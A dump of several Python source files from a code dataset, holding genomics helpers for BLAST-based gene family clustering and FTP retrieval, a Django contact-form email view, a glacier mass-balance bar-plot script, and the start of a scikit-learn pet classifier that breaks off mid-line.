os.mkdir(path)\n\ndef create_output_directories(path):\n    '''\n    Create the full set of directories for a given path\n    '''\n    path_splits = path.split('/')\n    new_path = []\n    for i, split in enumerate(path_splits):\n        new_path.append(split)\n        create_directory(\"/\".join(new_path))\n\ndef create_strict_output_directories(path):\n    '''\n    Create the full set of directories for a given path, replacing any that already exist\n    '''\n    path_splits = path.split('/')\n    new_path = []\n    for i, split in enumerate(path_splits):\n        new_path.append(split)\n        create_strict_directory(\"/\".join(new_path))\n\n\ndef copy_file(src, dest):\n    '''\n    Copy a file from src to dest.\n    '''\n    shutil.copyfile(src, dest)\n\ndef extend_family(blast_results, families, query):\n    '''\n    Given a gene identifier (query), find all genes that are connected to it\n    in the BLAST results (i.e. one is a hit for the other). Add them to the current family and remove\n    the relevant lines from the BLAST results.\n    '''\n    to_add = [i for i in blast_results if query in i]\n    blast_results = [i for i in blast_results if query not in i]\n    to_add = flatten(to_add)\n    families[-1].extend(to_add)\n    families[-1] = list(set(families[-1]))\n    return(blast_results, families)\n\ndef extract_head_of_file(file_path, lines):\n    '''\n    Extract a certain number of lines from a file\n    '''\n    output_path = \".\".join(file_path.split('.')[:-1]) + '.extracted.{}.'.format(lines) + file_path.split('.')[-1]\n    remove_file(output_path)\n    with open(file_path, 'r') as file:\n        head = list(it.islice(file, lines))\n    with open(output_path, 'w') as output_file:\n        for line in head:\n            output_file.write(line)\n\ndef find_families(fasta_file_name, output_prefix, blast_db_path, descriptions_file):\n    '''\n    Given a fasta file, group the sequences into paralogous families.\n    '''\n    blast_results_file_name = \"{0}_blast_results\".format(output_prefix)\n    output_prefix_short = output_prefix.split(\"/\")\n    output_prefix_short = output_prefix_short[-1]\n    #run a BLAST all against all for the sequences in the fasta file\n    blast_all_against_all(\"{0}_blast_db\".format(output_prefix_short), fasta_file_name, blast_results_file_name, blast_db_path)\n    names, seqs = read_fasta(fasta_file_name)\n\n    #create an empty list for storing the indices of BLAST query - hit pairs to delete\n    #open a .csv file containing the results of a BLAST and turn it into a list\n    #delete all of the information except the identifiers of queries and hits\n    #identify those pairs where the query and the hit come from the same sequence and delete them\n    to_delete = []\n    with open(blast_results_file_name) as csvfile:\n        blast_results = csv.reader(csvfile, delimiter=',')\n        blast_results = 
list(blast_results)\n        print(\"Total number of BLAST hits.\")\n        print(len(blast_results))\n        for i in blast_results:\n            del i[2:12]\n            if i[0] == i[1]:\n                to_delete.append(i)\n        print(\"Elements to delete:\")\n        print(len(to_delete))\n        print(\"Unique elements to delete:\")\n        print(len(list(set(flatten(to_delete)))))\n        for i in list(reversed(to_delete)):\n            blast_results.remove(i)\n\n    print(\"Number of results without self-matches:\")\n    print(len(blast_results))\n    queries = [i for i,j in blast_results]\n    print(\"Number of queries:\")\n    print(len(queries))\n    print(\"Number of unique queries:\")\n    print(len(list(set(queries))))\n    matches = [j for i,j in blast_results]\n    print(\"Number of matches:\")\n    print(len(matches))\n    print(\"Number of unique matches:\")\n    print(len(list(set(matches))))\n\n    print(\"Genes that don't overlap between queries and matches:\")\n    for i in list(set(queries)):\n        if i not in list(set(matches)):\n            print(i)\n    for i in list(set(matches)):\n        if i not in list(set(queries)):\n            print(i)\n\n    #while there are query-hit pairs left:\n    #pick a random pair out of the remaining query-hit pairs and use it to seed a new family\n    #(this is now the current family)\n    #then keep looping over the genes in the current family, each time adding everything they\n    #match or are a match to, until a full pass adds nothing new\n    #once a family stops growing, seed the next family from the remaining query-hit pairs\n    families = []\n    while len(blast_results) > 0:\n        seen = []\n        current_pair = random.choice(blast_results)\n        families.append(current_pair)\n        added_something = True\n        while added_something:\n            length_before = len(families[-1])\n            for query in families[-1]:\n                if query not in seen:\n                    seen.append(query)\n                    [blast_results, families] = extend_family(blast_results, families, query)\n            if len(families[-1]) == length_before:\n                #nothing new was added on this pass, so the family is complete\n                added_something = False\n\n    families_file_name = \"{0}_families.txt\".format(output_prefix)\n    families_descriptions_file_name = \"{0}_families_descriptions.txt\".format(output_prefix)\n    descriptions = read_many_fields(descriptions_file, \"\\t\")\n    descriptions = list_to_dict(descriptions, 0, 1)\n    families_file = open(families_file_name,\"w\")\n    with open(families_descriptions_file_name, \"w\") as fd_file:\n        for family in families:\n            families_file.write(\"{0}\\n\".format(\",\".join(family)))\n            fd = [descriptions[i] for i in family]\n            fd_file.write(\"{0}\\n\".format(\",\".join(fd)))\n\n    #create flat version of the families list so you could count the total number of genes that have been allocated to a family\n    flat_families = flatten(families)\n\n    #these two numbers should be identical\n    print(\"Number of genes in families:\")\n    print(len(flat_families))\n    print(\"Number of unique genes in families:\")\n    print(len(list(set(flat_families))))\n\n    #create a list with the sizes of all the different families\n    family_sizes = [len(i) for i in families]\n    
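# (added, hedged illustration of the clustering loop above; the gene names are made up)\n    # e.g. if the surviving BLAST pairs were [[\"g1\",\"g2\"], [\"g2\",\"g3\"], [\"g4\",\"g5\"]],\n    # the loop would build families == [[\"g1\",\"g2\",\"g3\"], [\"g4\",\"g5\"]] (up to ordering)\n    # and family_sizes == [3, 2]\n    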
print(\"Number of families:\")\n print(len(families))\n print(\"Distribution of family sizes:\")\n print(sorted(family_sizes))\n\n #close the output file\n families_file.close()\n\ndef find_families_ensembl(ensembl_file, transcript_IDs, out_file):\n '''\n Extract family data from a file with Ensembl protein families data.\n '''\n family_data = read_many_fields(ensembl_file, \"\\t\")\n family_data = [i for i in family_data if len(i[2]) > 0 and i[1] in transcript_IDs]\n #this is done so there'd be a more human-readable version of the families file\n #the descriptions file is not for downstreama analysis\n family_data_desc = list_to_dict(family_data, 2, 4, as_list = True)\n family_data_desc = {i: family_data_desc[i] for i in family_data_desc if len(family_data_desc[i]) > 1}\n family_data = list_to_dict(family_data, 2, 1, as_list = True)\n family_data = {i: family_data[i] for i in family_data if len(family_data[i]) > 1}\n desc_file = \"{0}_descriptions.txt\".format(out_file.split(\".\")[0])\n with open(out_file, \"w\") as o_file, open(desc_file, \"w\") as d_file:\n for family in sorted(family_data):\n o_file.write(\",\".join(family_data[family]))\n o_file.write(\"\\n\")\n d_file.write(\",\".join(family_data_desc[family]))\n d_file.write(\"\\n\")\n\ndef flatten(structured_list):\n '''\n Flatten a structured list.\n '''\n flat_list = list(it.chain(*structured_list))\n return(flat_list)\n\ndef ftp_check(ftp, host, user, password, pwd):\n '''\n Pings the FTP server to make sure the connection is live,\n reconnects if it isn't.\n '''\n try:\n #ping server\n ftp.voidcmd(\"NOOP\")\n return(ftp)\n #if connection has timed out\n except ftplib.error_temp:\n #reconnect\n ftp = ftp_connect(host, user, password, directory = pwd)\n return(ftp)\n\ndef ftp_connect(host, user, password, directory = None):\n '''\n Connect to FTP server.\n directory: if specified, change to that directory.\n '''\n connected = False\n while not connected:\n try:\n ftp = ftplib.FTP(host, timeout = 10000)\n connected = True\n except TimeoutError:\n print(\"TimeoutError! Trying again...\")\n ftp.login(user, password)\n if directory:\n ftp.cwd(directory)\n return(ftp)\n\ndef ftp_retrieve(ftp, host, user, password, directory, file_name, destination = None):\n '''\n Retrieve one or several files from an FTP site.\n Meant to be given a live FTP connection, with the correct working directory, but still needs information to connect in case there is a timeout.\n directory: source directory on the FTP site (only used in case of timeout)\n file: name of file to retrieve\n destination: save the file to this location. If unspecified, the current working directory will be used.\n '''\n if destination:\n #this is to make it easier to join the directory path with a file name\n destination = \"{0}/\".format(destination)\n else:\n destination = \"\"\n local_file_name = \"{0}{1}\".format(destination, file_name)\n #it's this complicated because you want to be able to retrieve binary data\n with open(local_file_name, \"wb\") as local_file:\n #check that the connection is live, reconnect otherwise\n ftp = ftp_check(ftp, host, user, password, directory)\n retrieved = False\n #sometimes the file doesn't transfer properly so you have to keep on\n #trying till you get it\n while not retrieved:\n try:\n ftp.retrbinary(\"RETR {0}\".format(file_name), local_file.write)\n retrieved = True\n except EOFError:\n print(\"EOFError! Trying again...\")\n pass\n except TimeoutError:\n print(\"TimeoutError! 
Trying again...\")\n                ftp = ftp_check(ftp, host, user, password, directory)\n    print(\"Retrieved file {0}.\".format(file_name))\n    return(ftp)\n\ndef get_extension(file_name, extension_length, valid_list = None):\n    '''\n    Determine the extension at the end of a file name.\n    file_name: name of the file\n    extension_length: expected length of extension\n    valid_list: if supplied, the extension must be one of the ones specified in this list\n    EX: get_extension(\"test.jpg\", 3, valid_list = [\"jpg\", \"gif\", \"png\"]) would return \"jpg\"\n    '''\n    extension = file_name[-extension_length:]\n    if valid_list:\n        if extension not in valid_list:\n            print(\"File format must be included in {0}!\".format(valid_list))\n            raise Exception\n    return(extension)\n\ndef get_time(start_time):\n    '''\n    Print out how many minutes have passed since start_time.\n    '''\n    current = time.time()\n    spent = round((current - start_time)/60, 2)\n    print(\"{0} minutes.\\n\".format(spent))\n\ndef line_count(file):\n    '''\n    Count the number of lines in a file.\n    '''\n    #not using wc -l because I want the number of lines, not the number of newlines.\n    output = run_process([\"grep\", \"-c\", \"^\", file])\n    return(int(output))\n\ndef list_to_dict(input_list, index1, index2, as_list = False, uniquify = False, floatify = False):\n    '''\n    Convert the input_list into a dictionary, with the index1th element of each sublist as the key and the index2th element as the value.\n    '''\n    if as_list and floatify:\n        print(\"_as_list_ and _floatify_ can't both be True!\")\n        raise Exception\n    output_dict = {}\n    for i in input_list:\n        if not as_list:\n            if floatify:\n                output_dict[i[index1]] = float(i[index2])\n            else:\n                output_dict[i[index1]] = i[index2]\n        else:\n            if i[index1] not in output_dict:\n                output_dict[i[index1]] = []\n            output_dict[i[index1]].append(i[index2])\n    if as_list and uniquify:\n        output_dict = {i: sorted(list(set(output_dict[i]))) for i in output_dict}\n    return(output_dict)\n\ndef motif_to_regex(motifs):\n    '''\n    Convert each motif string into a lookahead regex where only the first base\n    is matched and the rest is in the lookahead.\n    '''\n    regex = [re.compile(\"\".join([i[0],\"(?=\",i[1:],\")\"])) for i in motifs]\n    return(regex)\n\ndef parse_arguments(description, arguments, floats = None, flags = None, ints = None):\n    '''\n    Use argparse to parse a set of input arguments from the command line.\n    '''\n    if not floats:\n        floats = []\n    if not flags:\n        flags = []\n    if not ints:\n        ints = []\n    parser = argparse.ArgumentParser(description = description)\n    for pos, argument in enumerate(arguments):\n        if pos in flags:\n            parser.add_argument(\"--{0}\".format(argument), action = \"store_true\", help = argument)\n        else:\n            if pos in floats:\n                curr_type = float\n            elif pos in ints:\n                curr_type = int\n            else:\n                curr_type = str\n            parser.add_argument(argument, type = curr_type, help = argument)\n    args = parser.parse_args()\n    return(args)\n\ndef read_families(file):\n    '''\n    Read a families file (one family of paralogous genes per line, the member genes separated by commas) into a list,\n    with each sublist containing the identifiers of the genes belonging to one family.\n    '''\n    families = []\n    with open(file) as families_file:\n        for line in families_file:\n            current_family = line.rstrip(\"\\n\")\n            current_family = current_family.split(\",\")\n            current_family = [i for i in current_family if i != \"\"]\n            families.append(current_family)\n    return(families)\n\ndef read_fasta(input_file):\n    '''\n    Given a fasta file, return a list containing the sequence identifiers and a 
second list containing the sequences (in the same order).\n    '''\n    file_to_read = open(input_file)\n    input_lines = file_to_read.readlines()\n    file_to_read.close()\n    input_lines = [i.rstrip(\"\\n\") for i in input_lines]\n    names = [i.lstrip(\">\") for i in input_lines if i[0] == \">\"]\n    sequences = [i for i in input_lines if i[0] != \">\"]\n    if len(sequences) != len(names):\n        print(\"Problem extracting data from fasta file!\")\n        print(len(sequences))\n        print(len(names))\n        raise Exception\n    if len(sequences) == 0:\n        print(\"No sequences were extracted!\")\n        raise Exception\n    return(names, sequences)\n\ndef read_many_fields(input_file, delimiter):\n    '''\n    Read a csv/tsv/... into a list of lists with each sublist corresponding to one line.\n    '''\n    file_to_read = open(input_file)\n    try:\n        field_reader = csv.reader(file_to_read, delimiter = delimiter)\n        lines = []\n        for i in field_reader:\n            lines.append(i)\n        file_to_read.close()\n        return(lines)\n    except:\n        print(\"Problem reading file...\")\n        return [[\"Problem reading file\"]]\n\ndef remove_directory(dir):\n    '''\n    Remove a directory, if it exists.\n    '''\n    if os.path.exists(dir):\n        shutil.rmtree(dir)\n\ndef remove_file(file_name):\n    '''\n    Remove a file, if it exists.\n    '''\n    try:\n        os.remove(file_name)\n    except FileNotFoundError:\n        pass\n\ndef reverse_complement(base):\n    '''\n    Reverse complement a base.\n    '''\n    reverse_comps = {\n        \"A\": \"T\",\n        \"C\": \"G\",\n        \"G\": \"C\",\n        \"T\": \"A\",\n    }\n    return(reverse_comps[base])\n\n\ndef run_in_parallel(input_list, args, func, kwargs_dict = None, workers = None, onebyone = False):\n    '''\n    Take an input list, divide into chunks and then apply a function to each of the chunks in parallel.\n    input_list: a list of the stuff you want to parallelize over (for example, a list of gene names)\n    args: a list of arguments to the function. Put in \"foo\" in place of the argument you are parallelizing over.\n    func: the function\n    kwargs_dict: a dictionary of any keyword arguments the function might take\n    workers: number of parallel processes to launch\n    onebyone: if True, allocate one element from input_list to each process\n    '''\n    if not workers:\n        #divide by two to get the number of physical cores\n        #subtract one to leave one core free\n        workers = int(os.cpu_count()/2 - 1)\n    elif workers == \"all\":\n        workers = os.cpu_count()\n    #in the list of arguments, I put in \"foo\" for the argument that corresponds to whatever is in the input_list because I couldn't be bothered to do something less stupid\n    arg_to_parallelize = args.index(\"foo\")\n    if not onebyone:\n        #divide input_list into as many chunks as you're going to have processes\n        chunk_list = [input_list[i::workers] for i in range(workers)]\n    else:\n        #each element in the input list will constitute a chunk of its own.\n        chunk_list = input_list\n    pool = multiprocessing.Pool(workers)\n    results = []\n    #go over the chunks you made and launch a process for each\n    for elem in chunk_list:\n        current_args = args.copy()\n        current_args[arg_to_parallelize] = elem\n        if kwargs_dict:\n            process = pool.apply_async(func, tuple(current_args), kwargs_dict)\n        else:\n            process = pool.apply_async(func, tuple(current_args))\n        results.append(process)\n    pool.close()\n    pool.join()\n    return(results)\n\n\ndef run_process(arguments, return_string = True, input_to_pipe = None, return_error = False, file_for_input = None, file_for_output = None, univ_nl = True, shell = False):\n    '''\n    Run a command on the command line. 
Supply command as a list of strings.\n    EX: run_process([\"cat\", \"hello!\"], file_for_output = \"hello.txt\")\n    '''\n    if file_for_input:\n        input_file = open(file_for_input)\n        stdin_src = input_file\n    else:\n        stdin_src = subprocess.PIPE\n    if file_for_output:\n        output_file = open(file_for_output, \"w\")\n        stdout_dest = output_file\n    else:\n        stdout_dest = subprocess.PIPE\n    arguments = [str(i) for i in arguments]\n    if shell:\n        arguments = \" \".join(arguments)\n    process = subprocess.Popen(arguments, shell = shell, stdout = stdout_dest, stderr = subprocess.PIPE,\n                               stdin = stdin_src, universal_newlines = univ_nl)\n    if input_to_pipe:\n        stdout, stderr = process.communicate(input_to_pipe)\n    else:\n        stdout, stderr = process.communicate()\n    if file_for_input:\n        input_file.close()\n    if file_for_output:\n        output_file.close()\n    return_code = process.poll()\n    if return_code != 0:\n        print(\"Process failed!\")\n        print(\" \".join(arguments))\n        print(stderr)\n        return(\"error\")\n    #if the process returns bytes but you want to get a string back.\n    if return_string and type(stdout) == bytes:\n        stdout = stdout.decode(\"utf-8\")\n    if return_error:\n        return(stderr)\n    else:\n        return(stdout)\n\ndef update_counter(counter, step, string = None):\n    '''\n    Print out and update counter.\n    '''\n    if counter % step == 0:\n        if string:\n            print(\"{0}{1}\".format(string, counter))\n        else:\n            print(\"{0}\".format(counter))\n    counter = counter + 1\n    return(counter)\n\ndef write_to_fasta(names, seq, fasta_name):\n    '''\n    Write a set of sequence identifiers and sequences to fasta file.\n    '''\n    with open(fasta_name, \"w\") as file:\n        for i in range(len(names)):\n            file.write(\">{0}\\n\".format(names[i]))\n            file.write(\"{0}\\n\".format(seq[i]))\n\n\ndef stringify(item):\n    '''\n    Convert an item (or each element of a list) to a string.\n    '''\n    if isinstance(item, list):\n        return [str(i) for i in item]\n    else:\n        return str(item)\n\ndef update_reset_count(count, limit):\n    '''\n    Increment count, wrapping back to 0 once it reaches limit.\n    '''\n    if count >= limit:\n        count = 0\n    else:\n        count += 1\n    return count\n","sub_path":"generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":22294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433688216","text":"from django.core.mail import send_mail\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django.views.generic import CreateView\n\nfrom jogo.forms import ContatoForm\n\n\nclass ContatoView(View):\n\n    template = 'jogo/contato.html'\n\n    def get(self, request):\n        form = ContatoForm()\n        return render(request, self.template, {'form': form})\n\n    def post(self, request):\n        form = ContatoForm(request.POST)\n        if form.is_valid():\n            nome_time = form.cleaned_data['nome_time']\n            nome_contato = form.cleaned_data['nome_contato']\n            whats = form.cleaned_data['whats']\n            email = form.cleaned_data['email']\n\n            corpo = f'Nome do Time: {nome_time}\\n' \\\n                    f'Nome Contato: {nome_contato}\\n' \\\n                    f'WhatsApp: {whats}\\n' \\\n                    f'E-mail: {email}'\n\n            send_mail(\n                'Contato Realmatismo FC',  # subject\n                corpo,\n                'diegodenzer.devops@gmail.com',\n                ['realmatismo.cwb@gmail.com', 'marlosgiovanni@hotmail.com']\n            )\n\n            msg = 'Cadastro Realizado com sucesso!!!'\n\n            return render(request, self.template, {'form': ContatoForm(), 'msg': msg})\n        else:\n            return render(request, self.template, {'form': form})\n","sub_path":"jogo/view/contato.py","file_name":"contato.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106812006","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 
-*-\n\"\"\"\nCreated on Thu Jul 25 15:56:33 2019\n\n@author: zoescrewvala\n\"\"\"\n\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport pygemfxns_gcmbiasadj as pygemfxns\n\n#%%\ndef avg_parameters_20yr(component, area):\n \"\"\"\n sum up annually and convert to km^3, average every 20 yrs, then convert to m w.e. and average every 20 yrs again\n \"\"\"\n component_annual = ((pygemfxns.annual_sum_2darray(component))/1000)*area\n component_annual_regional_1 = np.sum(component_annual[:,1:], axis=0) # in km^3 aka gigatons\n component_avg_gt_20yr = (np.add.reduceat(component_annual_regional_1, np.arange(0, len(component_annual_regional_1), 20)))/20\n component_annual_regional_2 = ((component_annual_regional_1)/(np.sum(area[:,1:], axis=0)))*1000 # km^3 (gigatons) --> m w.e.\n component_avg_mwea_20yr = (np.add.reduceat(component_annual_regional_2, np.arange(0, len(component_annual_regional_2), 20)))/20\n \n return component_avg_gt_20yr, component_avg_mwea_20yr\n\n#%% X-Y PLOT\nsim_list = ['CanESM2', 'CCSM4', 'CSIRO-Mk3-6-0', 'CNRM-CM5', 'GFDL-CM3', 'GFDL-ESM2M', 'GISS-E2-R', 'IPSL-CM5A-LR', \n 'MPI-ESM-LR', 'NorESM1-M']\nrcp_list = ['26', '45', '85']\nRCP_list = ['RCP 2.6', 'RCP 4.5', 'RCP 8.5']\ncolor_list = ['b', 'm', 'r', 'k']\n\n\nfor j in range(len(rcp_list)): \n fig, axes = plt.subplots(2, 10, squeeze=False, sharex='col', sharey='row', \n gridspec_kw = {'wspace':0.1, 'hspace':0.05})\n for i in range(len(sim_list)):\n ds = xr.open_dataset(os.getcwd() + '/../Output/simulations/' + sim_list[i] + '/R1_' + sim_list[i] + '_rcp' + \n rcp_list[j] + '_c1_ba1_1sets_1980_2100.nc')\n time = ds.variables['year'].values[:]\n area = ds.variables['area_glac_annual'].values[:,:-1,0]\n # positive mass balance, summed annually\n acc = ds.variables['acc_glac_monthly'].values[:,:,0]\n# acc_annual = ((pygemfxns.annual_sum_2darray(acc))/1000)*area # convert m w.e. to km w.e.\n ref = ds.variables['refreeze_glac_monthly'].values[:,:,0]\n# refreeze_annual = ((pygemfxns.annual_sum_2darray(refreeze))/1000)*area # convert m w.e. to km w.e.\n mlt = ds.variables['melt_glac_monthly'].values[:,:,0]\n# melt_annual = ((pygemfxns.annual_sum_2darray(melt))/1000)*area # convert m w.e. to km w.e.\n abl = ds.variables['frontalablation_glac_monthly'].values[:,:,0]\n# ablation_annual = ((pygemfxns.annual_sum_2darray(melt))/1000)*area # convert m w.e. 
to km w.e.\n# \n acc_regional_avg_gt_20yr, acc_regional_avg_mwea_20yr = avg_parameters_20yr(acc, area)\n ref_regional_avg_gt_20yr, ref_regional_avg_mwea_20yr = avg_parameters_20yr(ref, area)\n mlt_regional_avg_gt_20yr, mlt_regional_avg_mwea_20yr = avg_parameters_20yr(mlt, area)\n abl_regional_avg_gt_20yr, abl_regional_avg_mwea_20yr = avg_parameters_20yr(abl, area)\n\n\n# # in gigatons (aka km^3)\n# refreeze_regional_annual = np.sum(refreeze_annual, axis=0)\n# acc_regional_annual = np.sum(acc_annual, axis=0)\n# melt_regional_annual = np.sum(melt_annual, axis=0)\n# ablation_regional_annual = np.sum(ablation_annual, axis=0)\n# \n# # averaged every 20 years\n# acc_regional_20yr = np.add.reduceat(acc_regional_annual[:-1], np.arange(0, len(acc_regional_annual)-1, 20))\n# acc_regional_20yr = (acc_regional_20yr)/20\n# refreeze_regional_20yr = np.add.reduceat(refreeze_regional_annual[:-1], np.arange(0, len(refreeze_regional_annual)-1, 20))\n# refreeze_regional_20yr = (refreeze_regional_20yr)/20\n# melt_regional_20yr = np.add.reduceat(melt_regional_annual[:-1], np.arange(0, len(melt_regional_annual)-1, 20))\n# melt_regional_20yr = (melt_regional_20yr)/20\n# ablation_regional_20yr = np.add.reduceat(ablation_regional_annual[:-1], np.arange(0, len(ablation_regional_annual)-1, 20))\n# ablation_regional_20yr = (ablation_regional_20yr)/20\n\n # X and Y values\n x_values = time[0:120:20]\n y_values = acc_regional_avg_gt_20yr\n y2_values = ref_regional_avg_gt_20yr\n y3_values = np.negative(mlt_regional_avg_gt_20yr)\n y4_values = np.negative(abl_regional_avg_gt_20yr)\n net = y_values + y2_values + y3_values + y4_values\n \n# # prep for averaging gcms\n# acc_gcm_avg_gt[i] = acc_regional_20yr\n# ref_gcm_avg_gt[i] = refreeze_regional_20yr\n# mlt_gcm_avg_gt[i] = melt_regional_20yr\n# abl_gcm_avg_gt[i] = ablation_regional_20yr\n \n # set up plot\n axes[0,i].bar(x_values, y_values, color='b', width=10, zorder=2)\n axes[0,i].bar(x_values, y2_values, bottom=y_values, color='m', width=10, zorder=3)\n axes[0,i].bar(x_values, y3_values, color='r', width=10, zorder=2)\n axes[0,i].bar(x_values, y4_values, bottom=y3_values, color='k', width=10, zorder=3)\n axes[0,i].scatter(x_values, net, color='w', marker='_', s=16, zorder=5)\n axes[0,i].set_title(label=sim_list[i], size=10, horizontalalignment='center', verticalalignment='baseline')\n\n ## m w.e. plots ##\n# # back to m w.e. 
after dividing by area\n# acc_regional_annual = ((np.sum(acc_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# refreeze_regional_annual = ((np.sum(refreeze_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# melt_regional_annual = ((np.sum(melt_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# ablation_regional_annual = ((np.sum(ablation_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# \n# # averaged every 20 years\n# acc_regional_20yr = np.add.reduceat(acc_regional_annual[:-1], np.arange(0, len(acc_regional_annual)-1, 20))\n# acc_regional_20yr = (acc_regional_20yr)/20\n# refreeze_regional_20yr = np.add.reduceat(refreeze_regional_annual[:-1], np.arange(0, len(refreeze_regional_annual)-1, 20))\n# refreeze_regional_20yr = (refreeze_regional_20yr)/20\n# melt_regional_20yr = np.add.reduceat(melt_regional_annual[:-1], np.arange(0, len(melt_regional_annual)-1, 20))\n# melt_regional_20yr = (melt_regional_20yr)/20\n# ablation_regional_20yr = np.add.reduceat(ablation_regional_annual[:-1], np.arange(0, len(ablation_regional_annual)-1, 20))\n# ablation_regional_20yr = (ablation_regional_20yr)/20\n\n # X and Y values\n x_values = time[0:120:20]\n y_values = acc_regional_avg_mwea_20yr\n y2_values = ref_regional_avg_mwea_20yr\n y3_values = np.negative(mlt_regional_avg_mwea_20yr)\n y4_values = np.negative(abl_regional_avg_mwea_20yr)\n net = y_values + y2_values + y3_values + y4_values\n\n \n# # prep for averaging gcms\n# acc_gcm_avg_mwea[i] = acc_regional_20yr\n# ref_gcm_avg_mwea[i] = refreeze_regional_20yr\n# mlt_gcm_avg_mwea[i] = melt_regional_20yr\n# abl_gcm_avg_mwea[i] = ablation_regional_20yr\n \n # set up plot\n axes[1,i].bar(x_values, y_values, color='b', width=10, zorder=2)\n axes[1,i].bar(x_values, y2_values, bottom=y_values, color='m', width=10, zorder=3)\n axes[1,i].bar(x_values, y3_values, color='r', width=10, zorder=2)\n axes[1,i].bar(x_values, y4_values, bottom=y3_values, color='k', width=10, zorder=3)\n axes[1,i].scatter(x_values, net, color='w', marker='_', s=16, zorder=4)\n\n# # averaging gcms\n# y_values = np.average(acc_gcm_avg_mwea, axis=0)\n# y2_values = np.average(ref_gcm_avg_mwea, axis=0)\n# y3_values = np.average(mlt_gcm_avg_mwea, axis=0)\n# y4_values = np.average(abl_gcm_avg_mwea, axis=0)\n \n# axes[1,i].set_title(label=sim_list[i], size=10, horizontalalignment='center', verticalalignment='baseline')\n\n ds.close()\n\n # figure styling\n# plt.subplots_adjust(bottom=0.1, right=0.4, top=0.4)\n\n # X-label\n for i in range(10):\n axes[1,i].set_xlabel('Year', size=12)\n axes[1,i].xaxis.set_major_locator(plt.MultipleLocator(40))\n axes[1,i].xaxis.set_minor_locator(plt.MultipleLocator(10))\n axes[1,i].tick_params(axis='x', rotation=70)\n #ax[0,0].set_xlim(0, 1.1)\n #ax[0,0].xaxis.set_tick_params(labelsize=12)\n #ax[0,0].set_xticklabels(['2015','2050','2100']) \n \n # Y-label\n axes[0,0].set_ylabel('Mass balance [Gt yr^-1]', size=10)\n axes[1,0].set_ylabel('Mass balance [m w.e. yr^-1]', size=10)\n axes[0,0].set_ylim(-110, 45)\n axes[1,0].set_ylim(-4.5, 1.75)\n \n # tick marks for m w.e. 
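\n    # (added note) with set_ylim(-4.5, 1.75) above, plt.MultipleLocator(2) places the major\n    # y-ticks at -4, -2 and 0, while plt.MultipleLocator(0.5) fills in the minor ticks between them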
\n    axes[1,0].yaxis.set_major_locator(plt.MultipleLocator(2))\n    axes[1,0].yaxis.set_minor_locator(plt.MultipleLocator(0.5))    \n    \n    # tick marks for Gt\n    axes[0,0].yaxis.set_major_locator(plt.MultipleLocator(40))\n    axes[0,0].yaxis.set_minor_locator(plt.MultipleLocator(10))    \n    \n    \n    # Legend\n#    leg_lines = []\n#    labels = ['Refreeze', 'Accumulation', 'Melt', 'Frontal Ablation']\n#    label_colors = ['m', 'b', 'r', 'k']\n#    for nlabel, label in enumerate(labels):\n#        line = Line2D([0,0.5],[0,0.5], color=label_colors[nlabel], linewidth=2)\n#        leg_lines.append(line)\n#    axes[1,0].set_zorder(3)\n#    axes[1,0].legend(leg_lines, labels, loc=(0.05,0.05), fontsize=12, \n#                     labelspacing=0.25, handlelength=1, handletextpad=0.25, borderpad=0, frameon=False)\n    \n    axes[1,0].text(1975, -4.2, RCP_list[j], fontsize=16, fontweight='extra bold')\n\n    # save figure\n    fig.set_size_inches(15, 6)\n    figure_fp = os.getcwd() + '/../Output/plots/gcm_compare_parameters/'\n    if os.path.exists(figure_fp) == False:\n        os.makedirs(figure_fp)\n    figure_fn = 'massbalparams_plot_' + rcp_list[j] + '.png'\n    fig.savefig(figure_fp + figure_fn, bbox_inches='tight', dpi=300)\n    \n    # clear figure window after saving\n    plt.clf()\n\n","sub_path":"barplot_parameters.py","file_name":"barplot_parameters.py","file_ext":"py","file_size_in_byte":9893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"386461141","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug  8 07:45:48 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport seaborn as sns\r\ndf = pd.read_csv(\"train.csv\").dropna()\r\n\r\ndf[\"height(cm)\"] = df['height(cm)'] / 100\r\n\r\ndf.rename(columns = {\"height(cm)\" : \"height(m)\"}, inplace = True)\r\n\r\nX = df.iloc[:,[3, 5, 6, 7, 8]].values\r\ny = df.iloc[:,10].values\r\n\r\ndf.head()\r\n\r\ndf[\"pet_category\"].unique()\r\ndf[\"breed_category\"].unique()\r\ndf[\"color_type\"].unique()\r\ndf[\"condition\"].unique()\r\n\r\nplt.scatter(\"pet_category\", \"breed_category\", data = df)\r\nplt.scatter(\"pet_category\", \"color_type\", data = df)\r\nplt.scatter(\"pet_category\", \"height(m)\", data = df)\r\nplt.scatter(\"pet_category\", \"condition\", data = df)\r\nplt.scatter(\"pet_category\", \"length(m)\", data = df)\r\nplt.scatter(\"pet_category\", \"X1\", data = df)\r\nplt.scatter(\"pet_category\", \"X2\", data = df)\r\n\r\n#Splitting data set into training and test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.7) \r\n\r\n#Applying various classifiers\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.ensemble import RandomForestClassifier \r\n\r\nmodels = []\r\nmodels.append((\"LR\", LogisticRegression(solver = 'liblinear', multi_class= 'ovr')))\r\nmodels.append((\"KNN\", KNeighborsClassifier()))\r\nmodels.append((\"NB\", GaussianNB()))\r\nmodels.append((\"RF\", RandomForestClassifier(n_estimators=100, criterion='gini')))\r\n\r\n#K-fold Cross Validation\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nbest_mean = []\r\nbest_std = []\r\nnames = []\r\n\r\nmodel_performance = 